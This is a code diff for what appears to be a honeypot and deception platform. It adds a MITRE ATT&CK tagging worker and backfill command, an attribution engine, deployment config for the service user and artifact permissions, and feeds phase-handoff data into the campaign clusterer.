"db-reset", "init", "webhook", "clusterer", "campaign-clusterer", "db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
# `ttp` runs on agents — local SMTP decoys persist .eml files into the
# agent's artifacts tree and the EmailLifter disk-reaches them in-process
# (DEBT-047). `ttp-backfill` stays master-only: it walks the master DB.
"ttp-backfill",
}) })
MASTER_ONLY_GROUPS: frozenset[str] = frozenset( MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
{"swarm", "topology", "geoip", "realism"} {"swarm", "topology", "geoip", "realism"}
@@ -65,7 +69,7 @@ def _gate_commands_by_mode(_app: typer.Typer) -> None:
return return
_app.registered_commands = [ _app.registered_commands = [
c for c in _app.registered_commands c for c in _app.registered_commands
if (c.name or c.callback.__name__) not in MASTER_ONLY_COMMANDS if (c.name or (c.callback.__name__ if c.callback else "")) not in MASTER_ONLY_COMMANDS
] ]
_app.registered_groups = [ _app.registered_groups = [
g for g in _app.registered_groups g for g in _app.registered_groups
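
The command filter in the gating hunk above resolves each command's effective name before comparing it against the master-only set. A minimal sketch of that resolution, assuming a stand-in `Cmd` record in place of Typer's registered-command object (the `Cmd` class, `effective_name`, `gate`, and the two-entry `MASTER_ONLY` set are all hypothetical):

```python
from dataclasses import dataclass
from typing import Callable, Optional

# Illustrative subset; the real frozenset in the diff is larger.
MASTER_ONLY = frozenset({"ttp-backfill", "web"})


@dataclass
class Cmd:
    """Hypothetical stand-in for a registered CLI command record."""
    name: Optional[str]
    callback: Optional[Callable[..., object]]


def effective_name(c: Cmd) -> str:
    # Explicit name wins; otherwise fall back to the callback's __name__,
    # and to "" when there is no callback at all (the guard added in the diff).
    return c.name or (c.callback.__name__ if c.callback else "")


def gate(cmds: list[Cmd]) -> list[Cmd]:
    """Drop every command whose effective name is master-only."""
    return [c for c in cmds if effective_name(c) not in MASTER_ONLY]
```

With the guard in place, a record that has neither a name nor a callback resolves to the empty string and is kept, instead of raising `AttributeError` on `None.__name__`.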


@@ -44,6 +44,12 @@ _CONFIG_PLACEHOLDER = """\
# EnvironmentFile= — never in a group-readable INI. # EnvironmentFile= — never in a group-readable INI.
[decnet] [decnet]
# DECNET-service user/group as configured at `decnet init` time.
# Resolved to a uid/gid on each host at deploy time via pwd.getpwnam,
# so the same user name can have different numeric uids on master vs
# agents without breaking artifact ownership.
api-user = {api_user}
api-group = {api_group}
# mode = master # or "agent" # mode = master # or "agent"
# [api] # [api]
@@ -74,6 +80,7 @@ _CONFIG_PLACEHOLDER = """\
# master-host = 10.0.0.1 # master-host = 10.0.0.1
# syslog-port = 6514 # syslog-port = 6514
# swarmctl-port = 8770 # swarmctl-port = 8770
# swarmctl-host = 127.0.0.1
# [logging] # [logging]
# system-log = /var/log/decnet/decnet.system.log # system-log = /var/log/decnet/decnet.system.log
@@ -197,14 +204,17 @@ def _ensure_dir(
return f"skip: {path} already present" if existed else "ok" return f"skip: {path} already present" if existed else "ok"
def _ensure_config(path: Path, group: str, *, dry_run: bool) -> str: def _ensure_config(
path: Path, group: str, *, user: str, dry_run: bool,
) -> str:
if path.exists(): if path.exists():
return f"skip: {path} already present" return f"skip: {path} already present"
if dry_run: if dry_run:
console.print(f" [dim]would write:[/] {path}") console.print(f" [dim]would write:[/] {path}")
return "ok" return "ok"
path.parent.mkdir(parents=True, exist_ok=True) path.parent.mkdir(parents=True, exist_ok=True)
path.write_text(_CONFIG_PLACEHOLDER) rendered = _CONFIG_PLACEHOLDER.format(api_user=user, api_group=group)
path.write_text(rendered)
try: try:
os.chmod(path, 0o640) os.chmod(path, 0o640)
gid = grp.getgrnam(group).gr_gid gid = grp.getgrnam(group).gr_gid
@@ -601,7 +611,7 @@ def register(app: typer.Typer) -> None:
# (Path("/"). / "/opt/decnet" == Path("/opt/decnet"), dropping pfx). # (Path("/"). / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
_install_rel = install_dir.lstrip("/") _install_rel = install_dir.lstrip("/")
required_tools = ("systemctl",) if deinit else ( required_tools: tuple[str, ...] = ("systemctl",) if deinit else (
"systemctl", "useradd", "groupadd", "systemd-tmpfiles", "systemctl", "useradd", "groupadd", "systemd-tmpfiles",
) )
if deinit: if deinit:
@@ -658,7 +668,7 @@ def register(app: typer.Typer) -> None:
) )
_step( _step(
"systemctl daemon-reload", "systemctl daemon-reload",
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
) )
_step( _step(
f"remove {etc_decnet / 'decnet.ini'}", f"remove {etc_decnet / 'decnet.ini'}",
@@ -754,6 +764,13 @@ def register(app: typer.Typer) -> None:
(pfx / _install_rel, 0o755, user, group), (pfx / _install_rel, 0o755, user, group),
(pfx / "var/lib/decnet", 0o750, user, group), (pfx / "var/lib/decnet", 0o750, user, group),
(pfx / "var/lib/decnet/geoip", 0o755, user, group), (pfx / "var/lib/decnet/geoip", 0o755, user, group),
# DEBT-035 / DEBT-047: artifact root carries setgid (the
# 0o2... bit) so every file written under it inherits the
# decnet group regardless of which container's uid created
# it. Group-write (0o2775) lets the API process and the
# local TTP worker read each other's outputs without a
# manual chown after every fresh deploy.
(pfx / "var/lib/decnet/artifacts", 0o2775, user, group),
(pfx / "var/log/decnet", 0o750, user, group), (pfx / "var/log/decnet", 0o750, user, group),
(etc_decnet, 0o755, "root", group), (etc_decnet, 0o755, "root", group),
(pfx / "run/decnet", 0o755, "root", group), (pfx / "run/decnet", 0o755, "root", group),
@@ -775,12 +792,15 @@ def register(app: typer.Typer) -> None:
for path, mode, d_owner, d_group in dirs: for path, mode, d_owner, d_group in dirs:
_step( _step(
f"ensure dir {path}", f"ensure dir {path}",
lambda p=path, m=mode, o=d_owner, g=d_group: lambda p=path, m=mode, o=d_owner, g=d_group: # type: ignore[misc]
_ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run), _ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
) )
_step( _step(
f"write {etc_decnet / 'decnet.ini'}", f"write {etc_decnet / 'decnet.ini'}",
lambda: _ensure_config(etc_decnet / "decnet.ini", group, dry_run=dry_run), lambda: _ensure_config(
etc_decnet / "decnet.ini", group,
user=user, dry_run=dry_run,
),
) )
_step( _step(
"install systemd units", "install systemd units",
@@ -812,7 +832,7 @@ def register(app: typer.Typer) -> None:
) )
_step( _step(
"systemctl daemon-reload", "systemctl daemon-reload",
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
) )
if no_start: if no_start:
@@ -823,7 +843,7 @@ def register(app: typer.Typer) -> None:
_step( _step(
"systemctl enable --now decnet.target", "systemctl enable --now decnet.target",
lambda: ( lambda: (
_run( _run( # type: ignore[func-returns-value]
["systemctl", "enable", "--now", "decnet.target"], ["systemctl", "enable", "--now", "decnet.target"],
dry_run=dry_run, dry_run=dry_run,
), ),
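
The artifact-root entry in the directory table above uses mode `0o2775`, where the leading `2` is the setgid bit. The sketch below only decodes the mode bits with the standard `stat` module; it does not touch the filesystem, and the helper names `describe` and `has_setgid` are hypothetical.

```python
import stat

ARTIFACT_MODE = 0o2775  # value taken from the diff
LOG_MODE = 0o750        # value taken from the diff, for comparison


def describe(mode: int) -> str:
    """Render a directory mode the way `ls -ld` would show it."""
    return stat.filemode(stat.S_IFDIR | mode)


def has_setgid(mode: int) -> bool:
    """True when the setgid bit (0o2000) is set."""
    return bool(mode & stat.S_ISGID)


print(describe(ARTIFACT_MODE))  # drwxrwsr-x
print(describe(LOG_MODE))       # drwxr-x---
```

The lowercase `s` in the group triplet marks setgid combined with group execute, which on Linux causes new files under the directory to inherit the directory's group.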


@@ -16,8 +16,16 @@ from .utils import console, log
def register(app: typer.Typer) -> None: def register(app: typer.Typer) -> None:
@app.command() @app.command()
def swarmctl( def swarmctl(
port: int = typer.Option(8770, "--port", help="Port for the swarm controller"), port: int = typer.Option(
host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"), 8770, "--port",
envvar="DECNET_SWARMCTL_PORT",
help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
),
host: str = typer.Option(
"127.0.0.1", "--host",
envvar="DECNET_SWARMCTL_HOST",
help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
),
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"), daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"), no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"), tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),


@@ -233,8 +233,8 @@ def _delete(
topo = await repo.get_topology(topology_id) topo = await repo.get_topology(topology_id)
if topo is None: if topo is None:
return False, "not-found" return False, "not-found"
if topo["status"] in _RUNNING: if topo.status in _RUNNING:
return False, str(topo["status"]) return False, str(topo.status)
ok = await repo.delete_topology_cascade(topology_id) ok = await repo.delete_topology_cascade(topology_id)
return ok, None return ok, None

decnet/cli/ttp.py (new file, 309 lines)

@@ -0,0 +1,309 @@
"""``decnet ttp`` — TTP-tagging worker and admin commands.
Two flat commands share this module:
* ``decnet ttp`` — runs the long-running tagger worker. Bus-woken on
``attacker.session.ended`` / ``attacker.observed`` /
``attacker.intel.enriched`` / ``identity.{formed,merged}`` /
``credential.reuse.detected`` / ``email.received`` / ``canary.>``;
dispatches each event through :class:`CompositeTagger` (RuleEngine +
Behavioral / Intel / CanaryFingerprint / Email / Identity / Credential
lifters), persists ``ttp_tag`` rows via the idempotent
``INSERT OR IGNORE`` write, and publishes ``ttp.tagged`` +
``ttp.rule.fired.<technique_id>`` only when the insert returned a
non-zero rowcount (loop-prevention invariant from TTP_TAGGING.md
§"Bus topics"). Invoked by the ``decnet-ttp.service`` systemd unit
so its argv must stay stable.
* ``decnet ttp-backfill`` — replays historical events (shell commands
recorded on :class:`Attacker.commands`, :class:`CanaryTrigger` rows)
through the live tagger. Writes ``ttp_tag`` rows using the same
idempotent insert path. **Does not publish** to the bus — replay must
not re-trigger SIEM/webhook fan-out on already-attributed events.
Only ``ttp-backfill`` is master-only (gated via ``MASTER_ONLY_COMMANDS`` in
:mod:`decnet.cli.gating`); ``ttp`` also runs on agents.
"""
from __future__ import annotations
import asyncio
import time
from datetime import datetime, timedelta, timezone
from typing import Any
import typer
from decnet.ttp.factory import CompositeTagger, get_tagger
from . import utils as _utils
from .utils import console, log
_BACKFILL_SOURCES = ("command", "canary", "all")
def register(app: typer.Typer) -> None:
@app.command(name="ttp")
def ttp(
poll_interval_secs: float = typer.Option(
60.0, "--poll-interval", "-i",
help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
),
daemon: bool = typer.Option(
False, "--daemon", "-d",
help="Detach to background as a daemon process",
),
) -> None:
"""TTP-tagging worker — MITRE ATT&CK technique tagging."""
from decnet.ttp.worker import run_ttp_worker_loop
from decnet.web.dependencies import repo
if daemon:
log.info("ttp daemonizing poll=%s", poll_interval_secs)
_utils._daemonize()
log.info("ttp command invoked poll=%s", poll_interval_secs)
console.print(
f"[bold cyan]TTP tagging worker starting[/] "
f"poll={poll_interval_secs}s"
)
console.print("[dim]Press Ctrl+C to stop[/]")
async def _run() -> None:
await repo.initialize()
await run_ttp_worker_loop(
repo, poll_interval_secs=poll_interval_secs,
)
try:
asyncio.run(_run())
except KeyboardInterrupt:
console.print("\n[yellow]TTP tagging worker stopped.[/]")
@app.command(name="ttp-backfill")
def ttp_backfill(
since_days: int = typer.Option(
7, "--since-days", "-s",
min=1, max=3650,
help="Replay events whose source row is newer than N days ago.",
),
source: str = typer.Option(
"all", "--source",
help=f"Source slice to replay. One of: {', '.join(_BACKFILL_SOURCES)}.",
),
dry_run: bool = typer.Option(
False, "--dry-run",
help="Run the tagger but skip insert_tags. Reports counts only.",
),
batch_size: int = typer.Option(
500, "--batch-size",
min=1, max=100_000,
help="Number of tags accumulated before each repo.insert_tags call.",
),
) -> None:
"""Replay historical attacker activity through the live tagger.
Walks ``Attacker.commands`` (per-IP shell-command history) and
``CanaryTrigger`` (canary callback log) since N days ago,
builds the same :class:`TaggerEvent` shape the live worker
emits, and persists tags via the idempotent INSERT OR IGNORE
write. Re-running is safe — a second pass over identical
source rows reports ``inserted=0``.
Bus publish is intentionally suppressed; SIEM / webhook fan-out
sees only live events, never replays.
"""
from decnet.cli.gating import _require_master_mode
from decnet.web.dependencies import repo
_require_master_mode("ttp-backfill")
if source not in _BACKFILL_SOURCES:
console.print(
f"[red]invalid --source {source!r}; expected one of "
f"{_BACKFILL_SOURCES}[/]"
)
raise typer.Exit(code=2)
cutoff = datetime.now(tz=timezone.utc) - timedelta(days=since_days)
console.print(
f"[bold cyan]TTP backfill[/] since={cutoff.isoformat()} "
f"source={source} dry_run={dry_run} batch_size={batch_size}"
)
async def _run() -> None:
await repo.initialize()
await _backfill(
repo,
cutoff=cutoff,
sources=_resolve_sources(source),
dry_run=dry_run,
batch_size=batch_size,
)
try:
asyncio.run(_run())
except KeyboardInterrupt:
console.print("\n[yellow]Backfill interrupted.[/]")
def _resolve_sources(name: str) -> tuple[str, ...]:
if name == "all":
return ("command", "canary")
return (name,)
async def _backfill(
repo: Any,
*,
cutoff: datetime,
sources: tuple[str, ...],
dry_run: bool,
batch_size: int,
) -> None:
"""Drive the per-source backfill loops and report structured counts.
One :class:`CompositeTagger` is built once and reused for every
source — the per-lifter watch fan-out the live worker performs is
inlined here as a `watch_store()` startup task per
:class:`WatchableTagger`, so the dispatch indexes hydrate before
we start feeding events.
"""
# Import-time bound so tests can monkeypatch ``decnet.cli.ttp.get_tagger``
# to inject a recording fake without touching the global factory.
tagger = get_tagger()
watch_tasks: list[asyncio.Task[None]] = []
if isinstance(tagger, CompositeTagger):
for watchable in tagger.iter_watchables():
watch_tasks.append(asyncio.create_task(watchable.watch_store()))
# Sleep briefly (best effort, not a guarantee) so each watch_store gets
# a chance to run its initial `load_compiled` before we feed the first event.
await asyncio.sleep(0.05)
try:
if "command" in sources:
await _backfill_commands(
repo, tagger, cutoff=cutoff,
dry_run=dry_run, batch_size=batch_size,
)
if "canary" in sources:
await _backfill_canaries(
repo, tagger, cutoff=cutoff,
dry_run=dry_run, batch_size=batch_size,
)
finally:
for task in watch_tasks:
task.cancel()
for task in watch_tasks:
try:
await task
except (asyncio.CancelledError, Exception): # noqa: BLE001
pass
async def _backfill_commands(
repo: Any,
tagger: Any,
*,
cutoff: datetime,
dry_run: bool,
batch_size: int,
) -> None:
from decnet.ttp.base import TaggerEvent
started = time.monotonic()
rows_seen = 0
cmds_seen = 0
inserted = 0
pending: list[Any] = []
async for attacker, commands in repo.iter_attacker_commands_since(cutoff):
rows_seen += 1
for idx, cmd in enumerate(commands):
cmds_seen += 1
text = cmd.get("command_text") or cmd.get("text")
if not isinstance(text, str):
continue
cmd_id = (
cmd.get("id")
or cmd.get("uuid")
or cmd.get("command_id")
or f"{attacker.uuid}#cmd{idx}"
)
event = TaggerEvent(
source_kind="command",
source_id=str(cmd_id),
attacker_uuid=attacker.uuid,
identity_uuid=getattr(attacker, "identity_id", None),
session_id=cmd.get("session_id"),
decky_id=cmd.get("decky_id") or cmd.get("decky"),
payload={**cmd, "command_text": text},
)
tags = await tagger.tag(event)
if tags:
pending.extend(tags)
if len(pending) >= batch_size:
inserted += await _flush(repo, pending, dry_run)
pending = []
if pending:
inserted += await _flush(repo, pending, dry_run)
elapsed = time.monotonic() - started
console.print(
f"source=command rows={rows_seen} commands={cmds_seen} "
f"inserted={inserted} dry_run={dry_run} elapsed_s={elapsed:.2f}"
)
async def _backfill_canaries(
repo: Any,
tagger: Any,
*,
cutoff: datetime,
dry_run: bool,
batch_size: int,
) -> None:
from decnet.ttp.base import TaggerEvent
started = time.monotonic()
rows_seen = 0
inserted = 0
pending: list[Any] = []
async for trigger in repo.iter_canary_triggers_since(cutoff):
rows_seen += 1
event = TaggerEvent(
source_kind="canary_fingerprint",
source_id=trigger.uuid,
attacker_uuid=trigger.attacker_id,
identity_uuid=None,
session_id=None,
decky_id=None,
payload={
"token_uuid": trigger.token_uuid,
"src_ip": trigger.src_ip,
"ua_signature": trigger.user_agent or "",
"user_agent": trigger.user_agent,
"request_path": trigger.request_path,
"dns_qname": trigger.dns_qname,
"headers": trigger.headers(),
},
)
tags = await tagger.tag(event)
if tags:
pending.extend(tags)
if len(pending) >= batch_size:
inserted += await _flush(repo, pending, dry_run)
pending = []
if pending:
inserted += await _flush(repo, pending, dry_run)
elapsed = time.monotonic() - started
console.print(
f"source=canary rows={rows_seen} inserted={inserted} "
f"dry_run={dry_run} elapsed_s={elapsed:.2f}"
)
async def _flush(repo: Any, tags: list[Any], dry_run: bool) -> int:
if dry_run:
return 0
return int(await repo.insert_tags(tags))
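
The accumulate-then-flush loop shared by `_backfill_commands` and `_backfill_canaries` can be exercised against an in-memory stand-in. This is a sketch under assumptions: `FakeRepo` and `events` are hypothetical, and the set-based `insert_tags` only imitates the idempotent write the docstrings describe; it is not the project's repository.

```python
import asyncio
from typing import AsyncIterator


class FakeRepo:
    """Hypothetical in-memory repo: insert_tags ignores tags it already holds."""

    def __init__(self) -> None:
        self.rows: set[str] = set()

    async def insert_tags(self, tags: list[str]) -> int:
        new = set(tags) - self.rows
        self.rows |= new
        return len(new)  # count of rows actually inserted


async def events() -> AsyncIterator[str]:
    """Hypothetical source: seven tags, so the last batch is partial."""
    for i in range(7):
        yield f"tag-{i}"


async def flush(repo: FakeRepo, tags: list[str], dry_run: bool) -> int:
    if dry_run:
        return 0
    return int(await repo.insert_tags(tags))


async def backfill(repo: FakeRepo, *, batch_size: int, dry_run: bool = False) -> int:
    inserted = 0
    pending: list[str] = []
    async for tag in events():
        pending.append(tag)
        if len(pending) >= batch_size:
            inserted += await flush(repo, pending, dry_run)
            pending = []
    if pending:  # flush the trailing partial batch
        inserted += await flush(repo, pending, dry_run)
    return inserted
```

Running `backfill` twice against the same `FakeRepo` shows the property the command's help text relies on: the first pass reports every tag as inserted and the second reports zero.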


@@ -11,7 +11,7 @@ import signal
import subprocess # nosec B404 import subprocess # nosec B404
import sys import sys
from pathlib import Path from pathlib import Path
from typing import Optional from typing import Any, Callable, Optional
import typer import typer
from rich.console import Console from rich.console import Console
@@ -96,7 +96,7 @@ def _is_running(match_fn) -> int | None:
return None return None
def _service_registry(log_file: str) -> list[tuple[str, callable, list[str]]]: def _service_registry(log_file: str) -> list[tuple[str, Callable[..., Any], list[str]]]:
"""Return the microservice registry for health-check and relaunch. """Return the microservice registry for health-check and relaunch.
On agents these run as systemd units invoking /usr/local/bin/decnet, On agents these run as systemd units invoking /usr/local/bin/decnet,
@@ -195,7 +195,7 @@ _DEFAULT_SWARMCTL_URL = "http://127.0.0.1:8770"
def _swarmctl_base_url(url: Optional[str]) -> str: def _swarmctl_base_url(url: Optional[str]) -> str:
return url or os.environ.get("DECNET_SWARMCTL_URL", _DEFAULT_SWARMCTL_URL) return url or os.environ.get("DECNET_SWARMCTL_URL") or _DEFAULT_SWARMCTL_URL
def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0): def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):
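
One observable effect of the `_swarmctl_base_url` change above is how an environment variable that is set but empty is handled. The sketch below compares both forms; the environment is passed in as a plain mapping so the behaviour can be checked without mutating `os.environ`, and the function names `base_url_old` and `base_url_new` are hypothetical.

```python
from typing import Mapping, Optional

DEFAULT_URL = "http://127.0.0.1:8770"  # value taken from the diff


def base_url_old(url: Optional[str], env: Mapping[str, str]) -> str:
    # The default only applies when the key is absent from the mapping.
    return url or env.get("DECNET_SWARMCTL_URL", DEFAULT_URL)


def base_url_new(url: Optional[str], env: Mapping[str, str]) -> str:
    # The default also applies when the key is present but empty.
    return url or env.get("DECNET_SWARMCTL_URL") or DEFAULT_URL


empty_env = {"DECNET_SWARMCTL_URL": ""}
print(repr(base_url_old(None, empty_env)))  # ''
print(repr(base_url_new(None, empty_env)))  # 'http://127.0.0.1:8770'
```

Whether this was the motivation for the change is not stated in the diff; the two forms behave identically when the variable is unset or non-empty.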


@@ -192,6 +192,70 @@ def register(app: typer.Typer) -> None:
except KeyboardInterrupt: except KeyboardInterrupt:
console.print("\n[yellow]Reuse correlator stopped.[/]") console.print("\n[yellow]Reuse correlator stopped.[/]")
@app.command(name="attribution")
def attribution(
multi_actor_tick_secs: float = typer.Option(
60.0, "--multi-actor-tick", "-t",
help=(
"Cross-primitive multi_actor correlator tick interval (seconds). "
"Walks attribution_state for identities flagged on >= 2 "
"primitives and emits attribution.profile.multi_actor_suspected."
),
),
daemon: bool = typer.Option(
False, "--daemon", "-d",
help="Detach to background as a daemon process",
),
) -> None:
"""Attribution engine v0 — per-(identity, primitive) state machine.
Subscribes to ``attacker.observation.>`` and, for each event,
ensures a stub identity row, runs the merger over the full
per-(identity, primitive) observation series, upserts the
derived state, and publishes
``attribution.profile.state_changed`` only on transition.
Periodic tick fires
``attribution.profile.multi_actor_suspected`` when >= 2
primitives flag the same identity.
Closes DEBT-051. Bright-line scope: behavioural coherence and
drift only — never persona attribution to natural persons.
"""
import asyncio
from decnet.correlation.attribution_worker import (
run_attribution_loop,
)
from decnet.web.dependencies import repo
if daemon:
log.info(
"attribution worker daemonizing tick=%s",
multi_actor_tick_secs,
)
_utils._daemonize()
log.info(
"attribution worker command invoked tick=%s",
multi_actor_tick_secs,
)
console.print(
f"[bold cyan]Attribution engine starting[/] "
f"multi_actor_tick={multi_actor_tick_secs}s"
)
console.print("[dim]Press Ctrl+C to stop[/]")
async def _run() -> None:
await repo.initialize()
await run_attribution_loop(
repo,
multi_actor_tick_secs=multi_actor_tick_secs,
)
try:
asyncio.run(_run())
except KeyboardInterrupt:
console.print("\n[yellow]Attribution engine stopped.[/]")
@app.command(name="clusterer")
def clusterer(
poll_interval_secs: float = typer.Option(
@@ -295,3 +359,10 @@ def register(app: typer.Typer) -> None:
asyncio.run(_run())
except KeyboardInterrupt:
console.print("\n[yellow]Campaign clusterer stopped.[/]")
# ``decnet ttp`` and ``decnet ttp-backfill`` moved to
# :mod:`decnet.cli.ttp` — the TTP CLI surface (worker + admin verbs)
# is colocated there, mirroring the per-feature CLI split used by
# :mod:`decnet.cli.canary`, :mod:`decnet.cli.webhook`, etc. The
# ``decnet-ttp.service`` systemd unit's ExecStart still resolves to
# ``decnet ttp`` because the command name is unchanged.
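
The `attribution` command's docstring describes two behaviours: publish `attribution.profile.state_changed` only on a transition, and flag an identity on the periodic tick once two or more primitives agree. The sketch below shows one way that logic could look in isolation. `TransitionTracker`, the `"flagged"` state name, and the payload shape are all hypothetical; the real worker lives in `decnet.correlation.attribution_worker` and is not shown in this diff. The sketch also assumes the first observation of a key counts as a transition.

```python
from typing import Callable


class TransitionTracker:
    """Hypothetical in-memory stand-in for the per-(identity, primitive) state table."""

    def __init__(self, publish: Callable[[str, dict], None]) -> None:
        self._publish = publish
        self._state: dict[tuple[str, str], str] = {}

    def upsert(self, identity: str, primitive: str, new_state: str) -> bool:
        """Store the derived state; publish only if it differs from the stored one."""
        key = (identity, primitive)
        old_state = self._state.get(key)
        self._state[key] = new_state
        if old_state == new_state:
            return False  # no transition, stay quiet
        self._publish(
            "attribution.profile.state_changed",
            {"identity": identity, "primitive": primitive,
             "from": old_state, "to": new_state},
        )
        return True

    def multi_actor_suspects(self, flagged: str = "flagged",
                             min_primitives: int = 2) -> list[str]:
        """Identities whose state equals *flagged* on at least *min_primitives* primitives."""
        counts: dict[str, int] = {}
        for (identity, _primitive), state in self._state.items():
            if state == flagged:
                counts[identity] = counts.get(identity, 0) + 1
        return sorted(i for i, n in counts.items() if n >= min_primitives)


events: list[tuple[str, dict]] = []
tracker = TransitionTracker(lambda topic, payload: events.append((topic, payload)))
tracker.upsert("id-1", "typing_cadence", "flagged")
tracker.upsert("id-1", "typing_cadence", "flagged")  # repeat, nothing published
tracker.upsert("id-1", "shell_idiom", "flagged")
```

Keeping the comparison inside `upsert` means the caller never has to remember the previous state, which matches the "upserts the derived state, and publishes only on transition" wording above.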

@@ -66,7 +66,10 @@ def cluster_identities(
return {f.identity_uuid: f"cmp-{find(f.identity_uuid)}" for f in feat_list}
-def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
+def from_identity_row(
+row: dict[str, Any],
+ttp_decky_phases: list[dict[str, Any]] | None = None,
+) -> IdentityFeatures:
"""Project an ``AttackerIdentity`` projection row dict into an
:class:`IdentityFeatures`.
@@ -75,20 +78,59 @@ def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
ja3_hashes / hassh_hashes / payload_simhashes / c2_endpoints
(JSON list[str] or null).
-Phase-handoff fields stay empty until the production-row adapter
-learns to mine logs for per-decky phase sequences (TODO.md
-"production-side payload + C2 + commands joins"). Without those,
-the campaign clusterer falls back to shared-infra + temporal
-overlap + cohort signals on production data; the fixture path
-exercises the full feature set via :func:`from_synthetic_identity`.
+*ttp_decky_phases* is the optional per-identity payload from
+:meth:`BaseRepository.list_ttp_decky_phases` — one row per
+``ttp_tag`` carrying ``(decky_id, tactic, created_at_ts)``. When
+provided, the adapter projects ``tactic`` → :class:`UKCPhase` and
+populates :attr:`IdentityFeatures.first_phase_per_decky` /
+``last_phase_per_decky`` / ``first_seen_per_decky`` /
+``last_seen_per_decky`` so the production phase-handoff edge
+finally fires. The synthetic fixture path
+(:func:`from_synthetic_identity`) is unchanged — fixtures keep
+emitting UKC directly.
"""
from decnet.clustering.ukc import tactic_to_ukc_phase # noqa: PLC0415
payload_hashes = _parse_json_list(row.get("payload_simhashes"))
c2_endpoints = _parse_json_list(row.get("c2_endpoints"))
first_phase_per_decky: dict[str, str] = {}
last_phase_per_decky: dict[str, str] = {}
first_seen_per_decky: dict[str, float] = {}
last_seen_per_decky: dict[str, float] = {}
decky_set: set[str] = set()
# Rows arrive ordered by ``created_at``; ``setdefault`` preserves
# the FIRST observation per decky, plain assignment captures the
# LAST. Tags whose tactic is outside the ATT&CK→UKC map (or whose
# phase is pre-target / unobservable) are dropped — they should
# not be assigned by any rule per TTP_TAGGING.md §UKC bridge.
for entry in ttp_decky_phases or []:
decky = entry.get("decky_id")
tactic = entry.get("tactic")
created_at_ts = entry.get("created_at_ts")
if not isinstance(decky, str) or not isinstance(tactic, str):
continue
phase = tactic_to_ukc_phase(tactic)
if phase is None:
continue
ts = float(created_at_ts) if isinstance(
created_at_ts, (int, float)) else 0.0
decky_set.add(decky)
first_phase_per_decky.setdefault(decky, phase.value)
last_phase_per_decky[decky] = phase.value
first_seen_per_decky.setdefault(decky, ts)
last_seen_per_decky[decky] = ts
return IdentityFeatures(
identity_uuid=row["uuid"],
payload_hashes=frozenset(payload_hashes),
c2_endpoints=frozenset(c2_endpoints),
decky_set=frozenset(decky_set),
first_phase_per_decky=first_phase_per_decky,
last_phase_per_decky=last_phase_per_decky,
first_seen_per_decky=first_seen_per_decky,
last_seen_per_decky=last_seen_per_decky,
)
@@ -132,8 +174,26 @@ class ConnectedComponentsCampaignClusterer(CampaignClusterer):
# merged out — their winner is the active row and gets clustered
# on its own. This keeps the campaign graph from double-counting.
active_rows = [r for r in rows if not r.get("merged_into_uuid")]
# Pull TTP-derived per-decky phase observations per identity
# (E.3.15). Failures here are non-fatal — the clusterer falls
# back to the empty phase-handoff signal, same as the legacy
# behavior, so a partial repo doesn't take the worker down.
decky_phases_by_identity: dict[str, list[dict[str, Any]]] = {}
for r in active_rows:
try:
decky_phases_by_identity[r["uuid"]] = (
await repo.list_ttp_decky_phases(r["uuid"])
)
except Exception: # noqa: BLE001
log.warning(
"campaign clusterer: list_ttp_decky_phases failed "
"for identity %s; phase-handoff edge inert",
r["uuid"],
)
decky_phases_by_identity[r["uuid"]] = []
feature_list: list[IdentityFeatures] = [
-from_identity_row(r) for r in active_rows
+from_identity_row(r, decky_phases_by_identity.get(r["uuid"]))
+for r in active_rows
]
row_by_uuid: dict[str, dict[str, Any]] = {
r["uuid"]: r for r in active_rows
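
The first/last bookkeeping in `from_identity_row` depends on rows arriving in `created_at` order: `setdefault` keeps the first value seen per decky and plain assignment keeps the last. A minimal standalone sketch of that pattern follows. The helper name `first_last_per_decky` and the `phase` key are illustrative only; the real adapter derives the phase from `tactic` through `tactic_to_ukc_phase`.

```python
from typing import Any


def first_last_per_decky(rows: list[dict[str, Any]]) -> tuple[dict[str, str], dict[str, str]]:
    """Return (first_phase, last_phase) per decky for rows already sorted by time."""
    first_phase: dict[str, str] = {}
    last_phase: dict[str, str] = {}
    for row in rows:
        decky = row.get("decky_id")
        phase = row.get("phase")
        if not isinstance(decky, str) or not isinstance(phase, str):
            continue  # skip malformed rows instead of failing the whole batch
        first_phase.setdefault(decky, phase)  # only the first write sticks
        last_phase[decky] = phase             # every write overwrites
    return first_phase, last_phase


rows = [
    {"decky_id": "web-01", "phase": "delivery"},
    {"decky_id": "db-01", "phase": "discovery"},
    {"decky_id": "web-01", "phase": "execution"},
    {"decky_id": None, "phase": "impact"},  # dropped: no decky
]
first, last = first_last_per_decky(rows)
```

If the repository ever returned rows unsorted, both dictionaries would silently reflect arrival order rather than time order, so the ordering guarantee is worth pinning in a test.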

@@ -342,7 +342,7 @@ def combined_campaign_weight(
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
